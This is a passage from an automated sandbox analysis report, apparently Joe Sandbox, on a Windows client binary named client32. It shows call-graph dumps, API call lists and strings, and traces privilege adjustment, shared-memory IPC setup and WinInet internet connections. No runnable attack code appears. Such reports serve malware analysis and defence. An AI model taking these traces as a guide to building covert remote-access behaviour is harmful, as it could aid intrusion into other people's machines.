calls 88216->88210 88217->88210 88218 110ae0c0 68 API calls 88217->88218 88218->88210 88219->88188 88223 110ae0a0 88220->88223 88226 11155cc3 88223->88226 88229 11155c44 88226->88229 88230 11155c51 88229->88230 88231 11155c6b 88229->88231 88247 11157ce2 66 API calls __getptd_noexit 88230->88247 88231->88230 88233 11155c74 GetFileAttributesA 88231->88233 88235 11155c82 GetLastError 88233->88235 88236 11155c98 88233->88236 88234 11155c56 88248 11157ccf 66 API calls __getptd_noexit 88234->88248 88250 11157cf5 66 API calls 2 library calls 88235->88250 88243 110840a2 88236->88243 88252 11157ce2 66 API calls __getptd_noexit 88236->88252 88239 11155c5d 88249 1115c8e4 11 API calls __close 88239->88249 88241 11155c8e 88251 11157ccf 66 API calls __getptd_noexit 88241->88251 88243->88210 88243->88216 88245 11155cab 88253 11157ccf 66 API calls __getptd_noexit 88245->88253 88247->88234 88248->88239 88249->88243 88250->88241 88251->88243 88252->88245 88253->88241 88254 6c823def HeapCreate 88255 1102e710 GetWindowRect 88256 1102e987 88255->88256 88257 1102e784 88255->88257 88258 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 88256->88258 88257->88256 88259 1102e78c GetWindowLongA 88257->88259 88260 1102e9a4 88258->88260 88259->88256 88261 1102e7a6 GetClassNameA 88259->88261 88262 1102e7c0 88261->88262 88262->88256 88263 1102e7ed GetWindowThreadProcessId OpenProcess 88262->88263 88263->88256 88264 1102e819 88263->88264 88283 11024b20 LoadLibraryA 88264->88283 88266 1102e824 88284 11024b50 88266->88284 88268 1102e843 88269 1102e96f CloseHandle 88268->88269 88271 110c57c0 265 API calls 88268->88271 88269->88256 88270 1102e980 FreeLibrary 88269->88270 88270->88256 88272 1102e85d 88271->88272 88294 110c5320 86 API calls std::locale::facet::_Facet_Register 88272->88294 88274 1102e871 88275 1102e960 88274->88275 88276 1102e879 88274->88276 88296 110c5870 265 API calls 2 library calls 88275->88296 88278 1107c480 std::locale::facet::_Facet_Register IsDBCSLeadByte 88276->88278 88279 1102e88c 88278->88279 88280 111356e0 std::locale::facet::_Facet_Register 21 API calls 88279->88280 88281 1102e8b0 88280->88281 88295 1104bd60 266 API calls 3 library calls 88281->88295 88283->88266 88285 11024b5e GetProcAddress 88284->88285 88286 11024b6f 88284->88286 88285->88286 88287 11024b88 88286->88287 88288 11024b7c K32GetProcessImageFileNameA 88286->88288 88289 11024b8e GetProcAddress 88287->88289 88290 11024b9f 88287->88290 88288->88287 88291 11024bc1 88288->88291 88289->88290 88292 11024ba6 88290->88292 88293 11024bb7 SetLastError 88290->88293 88291->88268 88292->88268 88293->88291 88294->88274 88295->88275 88296->88269 88297 6c823856 88298 6c823861 88297->88298 88299 6c823866 88297->88299 88311 6c82cffd GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 88298->88311 88303 6c823760 88299->88303 88302 6c823874 88304 6c82376c 88303->88304 88305 6c8237c4 ___DllMainCRTStartup 88304->88305 88306 6c8237b1 __CRT_INIT 88304->88306 88307 6c82380d 88304->88307 88309 6c8237f2 88305->88309 88310 6c8237e0 __CRT_INIT 88305->88310 88306->88305 88306->88307 88307->88302 88308 6c823801 __CRT_INIT 88308->88307 88309->88307 88309->88308 88310->88309 88311->88299 88312 111580ed 88313 111580fd 88312->88313 88314 111580f8 88312->88314 88318 11157ff7 88313->88318 88330 11165877 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 88314->88330 88317 1115810b 88319 11158003 __close 88318->88319 88323 11158050 88319->88323 88329 111580a0 __close 88319->88329 88331 11157e93 88319->88331 88322 11158063 88324 11158080 88322->88324 88326 11024c70 ___DllMainCRTStartup 7 API calls 88322->88326 88323->88329 88381 11024c70 88323->88381 88325 11157e93 __CRT_INIT@12 149 API calls 88324->88325 88324->88329 88325->88329 88327 11158077 88326->88327 88328 11157e93 __CRT_INIT@12 149 API calls 88327->88328 88328->88324 88329->88317 88330->88313 88332 11157e9f __close 88331->88332 88333 11157ea7 88332->88333 88334 11157f21 88332->88334 88390 1115beb0 HeapCreate 88333->88390 88336 11157f27 88334->88336 88337 11157f82 88334->88337 88342 11157f45 88336->88342 88352 11157eb0 __close 88336->88352 88478 1115c17b 66 API calls _doexit 88336->88478 88338 11157f87 88337->88338 88339 11157fe0 88337->88339 88341 11159fda ___set_flsgetvalue 3 API calls 88338->88341 88339->88352 88484 1115a2de 79 API calls __freefls@4 88339->88484 88340 11157eac 88340->88352 88391 1115a34c GetModuleHandleW 88340->88391 88345 11157f8c 88341->88345 88343 11157f59 88342->88343 88479 1115fb4e 67 API calls _free 88342->88479 88482 11157f6c 70 API calls __mtterm 88343->88482 88350 1115879e __calloc_crt 66 API calls 88345->88350 88354 11157f98 88350->88354 88351 11157ebc __RTC_Initialize 88359 11157ecc GetCommandLineA 88351->88359 88374 11157ec0 88351->88374 88352->88323 88353 11157f4f 88480 1115a02b 70 API calls _free 88353->88480 88354->88352 88357 11157fa4 DecodePointer 88354->88357 88360 11157fb9 88357->88360 88358 11157f54 88481 1115bece HeapDestroy 88358->88481 88416 11165794 GetEnvironmentStringsW 88359->88416 88363 11157fd4 88360->88363 88364 11157fbd 88360->88364 88367 11151665 _free 66 API calls 88363->88367 88483 1115a068 66 API calls 4 library calls 88364->88483 88367->88352 88369 11157fc4 GetCurrentThreadId 88369->88352 88371 11157eea 88476 1115a02b 70 API calls _free 88371->88476 88475 1115bece HeapDestroy 88374->88475 88376 11157f0a 88376->88352 88477 1115fb4e 67 API calls _free 88376->88477 88382 11102cd0 88381->88382 88383 11102d04 ___DllMainCRTStartup 88382->88383 88384 11102cf1 88382->88384 88385 11102cdc 88382->88385 88383->88322 88501 11102c20 88384->88501 88385->88383 88388 11102c20 ___DllMainCRTStartup 7 API calls 88385->88388 88387 11102cf8 88387->88322 88389 11102ce5 88388->88389 88389->88322 88390->88340 88392 1115a360 88391->88392 88393 1115a369 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 88391->88393 88485 1115a02b 70 API calls _free 88392->88485 88399 1115a3b3 TlsAlloc 88393->88399 88396 1115a365 88396->88351 88397 1115a401 TlsSetValue 88398 1115a4c2 88397->88398 88400 1115a412 88397->88400 88398->88351 88399->88397 88399->88398 88486 1115bf37 EncodePointer EncodePointer __init_pointers _raise __initp_misc_winsig 88400->88486 88402 1115a417 EncodePointer EncodePointer EncodePointer EncodePointer 88487 11161d6c InitializeCriticalSectionAndSpinCount 88402->88487 88404 1115a456 88405 1115a4bd 88404->88405 88406 1115a45a DecodePointer 88404->88406 88489 1115a02b 70 API calls _free 88405->88489 88408 1115a46f 88406->88408 88408->88405 88409 1115879e __calloc_crt 66 API calls 88408->88409 88410 1115a485 88409->88410 88410->88405 88411 1115a48d DecodePointer 88410->88411 88412 1115a49e 88411->88412 88412->88405 88413 1115a4a2 88412->88413 88488 1115a068 66 API calls 4 library calls 88413->88488 88415 1115a4aa GetCurrentThreadId 88415->88398 88417 111657b0 WideCharToMultiByte 88416->88417 88422 11157edc 88416->88422 88419 111657e5 88417->88419 88420 1116581d FreeEnvironmentStringsW 88417->88420 88421 11158759 __malloc_crt 66 API calls 88419->88421 88420->88422 88423 111657eb 88421->88423 88429 1115f909 GetStartupInfoW 88422->88429 88423->88420 88424 111657f3 WideCharToMultiByte 88423->88424 88425 11165805 88424->88425 88426 11165811 FreeEnvironmentStringsW 88424->88426 88427 11151665 _free 66 API calls 88425->88427 88426->88422 88428 1116580d 88427->88428 88428->88426 88430 1115879e __calloc_crt 66 API calls 88429->88430 88432 1115f927 88430->88432 88431 11157ee6 88431->88371 88442 111656d9 88431->88442 88432->88431 88434 1115fa9c 88432->88434 88435 1115879e __calloc_crt 66 API calls 88432->88435 88441 1115fa1c 88432->88441 88433 1115fad2 GetStdHandle 88433->88434 88434->88433 88436 1115fb36 SetHandleCount 88434->88436 88437 1115fae4 GetFileType 88434->88437 88440 1115fb0a InitializeCriticalSectionAndSpinCount 88434->88440 88435->88432 88436->88431 88437->88434 88438 1115fa53 InitializeCriticalSectionAndSpinCount 88438->88431 88438->88441 88439 1115fa48 GetFileType 88439->88438 88439->88441 88440->88431 88440->88434 88441->88434 88441->88438 88441->88439 88443 111656f3 GetModuleFileNameA 88442->88443 88444 111656ee 88442->88444 88446 1116571a 88443->88446 88496 1115f565 94 API calls __setmbcp 88444->88496 88490 1116553f 88446->88490 88449 11158759 __malloc_crt 66 API calls 88450 1116575c 88449->88450 88451 1116553f _parse_cmdline 76 API calls 88450->88451 88452 11157ef6 88450->88452 88451->88452 88452->88376 88453 11165463 88452->88453 88454 1116546c 88453->88454 88456 11165471 _strlen 88453->88456 88498 1115f565 94 API calls __setmbcp 88454->88498 88457 1115879e __calloc_crt 66 API calls 88456->88457 88461 11157eff 88456->88461 88458 111654a6 _strlen 88457->88458 88459 111654f5 88458->88459 88458->88461 88462 1115879e __calloc_crt 66 API calls 88458->88462 88463 1116551b 88458->88463 88465 1115a87f _strcpy_s 66 API calls 88458->88465 88466 11165532 88458->88466 88460 11151665 _free 66 API calls 88459->88460 88460->88461 88461->88376 88469 1115bf8e 88461->88469 88462->88458 88464 11151665 _free 66 API calls 88463->88464 88464->88461 88465->88458 88467 1115c892 __invoke_watson 10 API calls 88466->88467 88468 1116553e 88467->88468 88470 1115bf9c __IsNonwritableInCurrentImage 88469->88470 88499 1115b3ab EncodePointer 88470->88499 88472 1115bfba __initterm_e 88474 1115bfdb __IsNonwritableInCurrentImage 88472->88474 88500 11151995 76 API calls __cinit 88472->88500 88474->88376 88475->88352 88476->88374 88477->88371 88478->88342 88479->88353 88480->88358 88481->88343 88482->88352 88483->88369 88484->88352 88485->88396 88486->88402 88487->88404 88488->88415 88489->88398 88491 1116555e 88490->88491 88494 111655cb 88491->88494 88497 11164ed0 76 API calls x_ismbbtype_l 88491->88497 88493 111656c9 88493->88449 88493->88452 88494->88493 88495 11164ed0 76 API calls _parse_cmdline 88494->88495 88495->88494 88496->88443 88497->88491 88498->88456 88499->88472 88500->88474 88502 11102c64 EnterCriticalSection 88501->88502 88503 11102c4f InitializeCriticalSection 88501->88503 88504 11102c85 88502->88504 88503->88502 88505 11102cb3 LeaveCriticalSection 88504->88505 88506 11102bc0 ___DllMainCRTStartup 4 API calls 88504->88506 88505->88387 88506->88504 88507 1102ea18 88508 11131ea0 267 API calls 88507->88508 88509 1102ea26 88508->88509 88510 11132000 86 API calls 88509->88510 88511 1102ea5a 88510->88511 88512 1102ea6f 88511->88512 88513 1107c4f0 86 API calls 88511->88513 88514 110e2140 8 API calls 88512->88514 88513->88512 88515 1102ea96 88514->88515 88516 1102eadd 88515->88516 88556 110e21f0 81 API calls 2 library calls 88515->88556 88520 11132000 86 API calls 88516->88520 88518 1102eaab 88557 110e21f0 81 API calls 2 library calls 88518->88557 88522 1102eaf2 88520->88522 88521 1102eac1 88521->88516 88523 11135660 19 API calls 88521->88523 88524 11102870 std::locale::facet::_Facet_Register 265 API calls 88522->88524 88523->88516 88525 1102eb01 88524->88525 88526 1102eb22 88525->88526 88527 11083130 268 API calls 88525->88527 88528 11084cb0 267 API calls 88526->88528 88527->88526 88529 1102eb35 OpenMutexA 88528->88529 88530 1102eb54 CreateMutexA 88529->88530 88531 1102ec5a CloseHandle 88529->88531 88532 1102eb76 88530->88532 88549 11084db0 88531->88549 88534 11102870 std::locale::facet::_Facet_Register 265 API calls 88532->88534 88536 1102eb8b 88534->88536 88535 1102ec70 88537 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 88535->88537 88538 1102ebae LoadLibraryA GetProcAddress 88536->88538 88539 1105c4b0 293 API calls 88536->88539 88541 1102f512 88537->88541 88542 1102ec05 88538->88542 88543 1102ec09 SetLastError 88538->88543 88539->88538 88558 110092f0 426 API calls std::locale::facet::_Facet_Register 88542->88558 88543->88542 88545 1102ec20 88546 1102ec30 WaitForSingleObject 88545->88546 88546->88546 88547 1102ec42 CloseHandle 88546->88547 88547->88531 88548 1102ec53 FreeLibrary 88547->88548 88548->88531 88550 11084dea std::ios_base::_Tidy 88549->88550 88551 11084e57 88549->88551 88550->88551 88553 11084dfe CloseHandle 88550->88553 88552 11084e5e DeleteCriticalSection 88551->88552 88559 11138390 88552->88559 88553->88550 88555 11084e84 std::ios_base::_Tidy 88555->88535 88556->88518 88557->88521 88558->88545 88562 111383a4 88559->88562 88560 111383a8 88560->88555 88562->88560 88563 11137f50 67 API calls 2 library calls 88562->88563 88563->88562 88564 9d1020 GetCommandLineW 88566 9d1035 GetStartupInfoW 88564->88566 88567 9d1099 GetModuleHandleW 88566->88567 88568 9d1094 88566->88568 88571 9d1000 _NSMClient32 88567->88571 88568->88567 88570 9d10ab ExitProcess 88571->88570

                                                        Executed Functions

                                                        Function 110964D0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 667 110964d0-11096532 call 11095cd0 670 11096538-1109655b call 11095790 667->670 671 11096b50 667->671 677 11096561-11096575 LocalAlloc 670->677 678 110966c4-110966c6 670->678 672 11096b52-11096b6d call 11150781 671->672 679 1109657b-110965ad InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 677->679 680 11096b45-11096b4b call 11095820 677->680 681 11096656-1109667b CreateFileMappingA 678->681 682 1109663a-11096650 679->682 683 110965b3-110965de call 11095700 call 11095740 679->683 680->671 685 110966c8-110966db GetLastError 681->685 686 1109667d-1109669d GetLastError call 110e5be0 681->686 682->681 713 11096629-11096631 683->713 714 110965e0-11096616 GetSecurityDescriptorSacl 683->714 688 110966dd 685->688 689 110966e2-110966f9 MapViewOfFile 685->689 699 110966a8-110966b0 686->699 700 1109669f-110966a6 LocalFree 686->700 688->689 692 110966fb-11096716 call 110e5be0 689->692 693 11096737-1109673f 689->693 716 11096718-11096719 LocalFree 692->716 717 1109671b-11096723 692->717 697 110967e1-110967f3 693->697 698 11096745-1109675e GetModuleFileNameA 693->698 701 11096839-11096852 call 111507a0 GetTickCount 697->701 702 110967f5-110967f8 697->702 703 110967fd-11096818 call 110e5be0 698->703 704 11096764-1109676d 698->704 705 110966b2-110966b3 LocalFree 699->705 706 110966b5-110966bf 699->706 700->699 732 11096854-11096859 701->732 709 110968df-11096943 GetCurrentProcessId GetModuleFileNameA call 11095b60 702->709 730 1109681a-1109681b LocalFree 703->730 731 1109681d-11096825 703->731 704->703 710 11096773-11096776 704->710 705->706 712 11096b3e-11096b40 call 11095c10 706->712 734 1109694b-11096962 CreateEventA 709->734 735 11096945 709->735 719 110967b9-110967dc call 110e5be0 call 11095c10 710->719 720 11096778-1109677c 710->720 712->680 713->682 724 11096633-11096634 FreeLibrary 713->724 714->713 723 11096618-11096623 SetSecurityDescriptorSacl 714->723 716->717 726 11096728-11096732 717->726 727 11096725-11096726 LocalFree 717->727 719->697 720->719 729 1109677e-11096789 720->729 723->713 724->682 726->712 727->726 736 11096790-11096794 729->736 730->731 737 1109682a-11096834 731->737 738 11096827-11096828 LocalFree 731->738 739 1109685b-1109686a 732->739 740 1109686c 732->740 744 11096964-11096983 GetLastError * 2 call 110e5be0 734->744 745 11096986-1109698e 734->745 735->734 742 110967b0-110967b2 736->742 743 11096796-11096798 736->743 737->712 738->737 739->732 739->740 746 1109686e-11096874 740->746 751 110967b5-110967b7 742->751 748 1109679a-110967a0 743->748 749 110967ac-110967ae 743->749 744->745 752 11096990 745->752 753 11096996-110969a7 CreateEventA 745->753 754 11096885-110968dd 746->754 755 11096876-11096883 746->755 748->742 756 110967a2-110967aa 748->756 749->751 751->703 751->719 752->753 758 110969a9-110969c8 GetLastError * 2 call 110e5be0 753->758 759 110969cb-110969d3 753->759 754->709 755->746 755->754 756->736 756->749 758->759 760 110969db-110969ed CreateEventA 759->760 761 110969d5 759->761 763 110969ef-11096a0e GetLastError * 2 call 110e5be0 760->763 764 11096a11-11096a19 760->764 761->760 763->764 767 11096a1b 764->767 768 11096a21-11096a32 CreateEventA 764->768 767->768 770 11096a54-11096a62 768->770 771 11096a34-11096a51 GetLastError * 2 call 110e5be0 768->771 773 11096a64-11096a65 LocalFree 770->773 774 11096a67-11096a6f 770->774 771->770 773->774 776 11096a71-11096a72 LocalFree 774->776 777 11096a74-11096a7d 774->777 776->777 778 11096a83-11096a86 777->778 779 11096b27-11096b39 call 110e5be0 777->779 778->779 780 11096a8c-11096a8f 778->780 779->712 780->779 783 11096a95-11096a98 780->783 783->779 784 11096a9e-11096aa1 783->784 785 11096aac-11096ac8 CreateThread 784->785 786 11096aa3-11096aa9 GetCurrentThreadId 784->786 787 11096aca-11096ad4 785->787 788 11096ad6-11096ae0 785->788 786->785 787->712 789 11096afa-11096b25 SetEvent call 110e5be0 call 11095820 788->789 790 11096ae2-11096af8 ResetEvent * 3 788->790 789->672 790->789
                                                        APIs
                                                          • Part of subcall function 11095790: GetCurrentProcess.KERNEL32(000F01FF,?,1102E62B,00000000,00000000,00080000,82E0FB89,00080000,00000000,00000000), ref: 110957BD
                                                          • Part of subcall function 11095790: OpenProcessToken.ADVAPI32(00000000), ref: 110957C4
                                                          • Part of subcall function 11095790: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 110957D5
                                                          • Part of subcall function 11095790: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 110957F9
                                                        • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,82E0FB89,00080000,00000000,00000000), ref: 11096565
                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109657E
                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 11096589
                                                        • GetVersionExA.KERNEL32(?), ref: 110965A0
                                                        • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109660E
                                                        • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 11096623
                                                        • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 11096634
                                                        • CreateFileMappingA.KERNEL32(000000FF,1102E62B,00000004,00000000,?,?), ref: 11096670
                                                        • GetLastError.KERNEL32 ref: 1109667D
                                                        • LocalFree.KERNEL32(?), ref: 110966A6
                                                        • LocalFree.KERNEL32(?), ref: 110966B3
                                                        • GetLastError.KERNEL32 ref: 110966D0
                                                        • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 110966EE
                                                        • LocalFree.KERNEL32(?), ref: 11096719
                                                        • LocalFree.KERNEL32(?), ref: 11096726
                                                          • Part of subcall function 11095700: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,110965BE), ref: 11095708
                                                          • Part of subcall function 11095740: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 11095754
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11096752
                                                        • LocalFree.KERNEL32(?), ref: 1109681B
                                                        • LocalFree.KERNEL32(?), ref: 11096828
                                                        • _memset.LIBCMT ref: 11096840
                                                        • GetTickCount.KERNEL32 ref: 11096848
                                                        • GetCurrentProcessId.KERNEL32 ref: 110968F4
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109690F
                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109695B
                                                        • GetLastError.KERNEL32 ref: 11096964
                                                        • GetLastError.KERNEL32(00000000), ref: 1109696B
                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 110969A0
                                                        • GetLastError.KERNEL32 ref: 110969A9
                                                        • GetLastError.KERNEL32(00000000), ref: 110969B0
                                                        • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 110969E6
                                                        • GetLastError.KERNEL32 ref: 110969EF
                                                        • GetLastError.KERNEL32(00000000), ref: 110969F6
                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 11096A2B
                                                        • GetLastError.KERNEL32 ref: 11096A3A
                                                        • GetLastError.KERNEL32(00000000), ref: 11096A3D
                                                        • LocalFree.KERNEL32(?), ref: 11096A65
                                                        • LocalFree.KERNEL32(?), ref: 11096A72
                                                        • GetCurrentThreadId.KERNEL32 ref: 11096AA3
                                                        • CreateThread.KERNEL32(00000000,00002000,Function_00096070,00000000,00000000,00000030), ref: 11096ABD
                                                        • ResetEvent.KERNEL32(?), ref: 11096AEC
                                                        • ResetEvent.KERNEL32(?), ref: 11096AF2
                                                        • ResetEvent.KERNEL32(?), ref: 11096AF8
                                                        • SetEvent.KERNEL32(?), ref: 11096AFE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                        • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                        • API String ID: 3291243470-2792520954
                                                        • Opcode ID: f773c3081aeaebb21c1be5ebe8f63fcd40c310f00c8f4f33c420054a7f1d20a5
                                                        • Instruction ID: 81383098c44230803e0ca2a3017f0c468739c05f63c930fd52011b603addab5e
                                                        • Opcode Fuzzy Hash: f773c3081aeaebb21c1be5ebe8f63fcd40c310f00c8f4f33c420054a7f1d20a5
                                                        • Instruction Fuzzy Hash: 55127FB5E0021D9FDB24DF61CCD4EAEB7F9FB88304F0445A9E51A97240EA71A984CF61
                                                        Function 110280F0 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 795 110280f0-1102817e LoadLibraryA 796 11028181-11028186 795->796 797 11028188-1102818b 796->797 798 1102818d-11028190 796->798 799 110281a5-110281aa 797->799 800 11028192-11028195 798->800 801 11028197-110281a2 798->801 802 110281d9-110281e5 799->802 803 110281ac-110281b1 799->803 800->799 801->799 806 1102828a-1102828d 802->806 807 110281eb-11028203 call 111515d1 802->807 804 110281b3-110281ca GetProcAddress 803->804 805 110281cc-110281cf 803->805 804->805 808 110281d1-110281d3 SetLastError 804->808 805->802 810 110282a8-110282c0 InternetOpenA 806->810 811 1102828f-110282a6 GetProcAddress 806->811 817 11028224-11028230 807->817 818 11028205-1102821e GetProcAddress 807->818 808->802 813 110282e4-110282f0 call 11151665 810->813 811->810 812 110282d9-110282e1 SetLastError 811->812 812->813 823 110282f6-11028327 call 11131740 call 11152870 813->823 824 1102856a-11028574 813->824 822 11028232-1102823b GetLastError 817->822 825 11028251-11028253 817->825 818->817 820 110282c2-110282ca SetLastError 818->820 820->822 822->825 826 1102823d-1102824f call 11151665 call 111515d1 822->826 848 11028329-1102832c 823->848 849 1102832f-11028344 call 1107c3b0 * 2 823->849 824->796 828 1102857a 824->828 830 11028270-1102827c 825->830 831 11028255-1102826e GetProcAddress 825->831 826->825 833 1102858c-1102858f 828->833 830->806 852 1102827e-11028287 830->852 831->830 835 110282cf-110282d7 SetLastError 831->835 837 11028591-11028596 833->837 838 1102859b-1102859e 833->838 835->806 842 110286ff-11028707 837->842 843 110285a0-110285a5 838->843 844 110285aa 838->844 850 11028710-11028723 842->850 851 11028709-1102870a FreeLibrary 842->851 845 110286cf-110286d4 843->845 846 110285ad-110285b5 844->846 855 110286d6-110286ed GetProcAddress 845->855 856 110286ef-110286f5 845->856 853 110285b7-110285ce GetProcAddress 846->853 854 110285d4-110285dd 846->854 848->849 869 11028346-1102834a 849->869 870 1102834d-11028359 849->870 851->850 852->806 853->854 858 1102868e-11028690 SetLastError 853->858 862 110285e0-110285e2 854->862 855->856 859 110286f7-110286f9 SetLastError 855->859 856->842 864 11028696-1102869d 858->864 859->842 862->864 866 110285e8-110285ed 862->866 867 110286ac-110286cd call 110265c0 * 2 864->867 866->867 871 110285f3-1102862f call 111028f0 call 11026570 866->871 867->845 869->870 873 11028384-11028389 870->873 874 1102835b-1102835d 870->874 896 11028641-11028643 871->896 897 11028631-11028634 871->897 880 1102838b-1102839c GetProcAddress 873->880 881 1102839e-110283b5 InternetConnectA 873->881 877 11028374-1102837a 874->877 878 1102835f-11028372 GetProcAddress 874->878 877->873 878->877 883 1102837c-1102837e SetLastError 878->883 880->881 885 110283e1-110283ec SetLastError 880->885 886 11028557-11028567 call 11150341 881->886 887 110283bb-110283be 881->887 883->873 885->886 886->824 891 110283c0-110283c2 887->891 892 110283f9-11028401 887->892 898 110283c4-110283d7 GetProcAddress 891->898 899 110283d9-110283df 891->899 894 11028403-11028417 GetProcAddress 892->894 895 11028419-11028434 892->895 894->895 903 11028436-1102843e SetLastError 894->903 909 11028441-11028444 895->909 900 11028645 896->900 901 1102864c-11028651 896->901 897->896 904 11028636-1102863a 897->904 898->899 902 110283f1-110283f3 SetLastError 898->902 899->892 900->901 905 11028653-11028669 call 110c6140 901->905 906 1102866c-1102866e 901->906 902->892 903->909 904->896 910 1102863c 904->910 905->906 912 11028670-11028672 906->912 913 11028674-11028685 call 11150341 906->913 914 11028552-11028555 909->914 915 1102844a-1102844f 909->915 910->896 912->913 918 1102869f-110286a9 call 11150341 912->918 913->867 928 11028687-11028689 913->928 914->886 917 1102857c-11028589 call 11150341 914->917 920 11028451-11028468 GetProcAddress 915->920 921 1102846a-11028476 915->921 917->833 918->867 920->921 925 11028478-11028480 SetLastError 920->925 927 11028482-1102849b GetLastError 921->927 925->927 931 110284b6-110284cb 927->931 932 1102849d-110284b4 GetProcAddress 927->932 928->846 935 110284d5-110284e3 GetLastError 931->935 932->931 933 110284cd-110284cf SetLastError 932->933 933->935 936 110284e5-110284ea 935->936 937 110284ec-110284f8 GetDesktopWindow 935->937 936->937 938 11028542-11028547 936->938 939 11028513-1102852f 937->939 940 110284fa-11028511 GetProcAddress 937->940 938->914 941 11028549-1102854f 938->941 939->914 944 11028531 939->944 940->939 942 11028536-11028540 SetLastError 940->942 941->914 942->914 944->909
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(WinInet.dll,82E0FB89,771B23A0,?,00000000), ref: 11028125
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110281BF
                                                        • SetLastError.KERNEL32(00000078), ref: 110281D3
                                                        • _malloc.LIBCMT ref: 110281F7
                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11028211
                                                        • GetLastError.KERNEL32 ref: 11028232
                                                        • _free.LIBCMT ref: 1102823E
                                                        • _malloc.LIBCMT ref: 11028247
                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11028261
                                                        • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102829B
                                                        • InternetOpenA.WININET(11182200,?,?,000000FF,00000000), ref: 110282BA
                                                        • SetLastError.KERNEL32(00000078), ref: 110282C4
                                                        • SetLastError.KERNEL32(00000078), ref: 110282D1
                                                        • SetLastError.KERNEL32(00000078), ref: 110282DB
                                                        • _free.LIBCMT ref: 110282E5
                                                          • Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
                                                          • Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11028365
                                                        • SetLastError.KERNEL32(00000078), ref: 1102837E
                                                        • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11028391
                                                        • InternetConnectA.WININET(000000FF,11187458,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110283AE
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110283CA
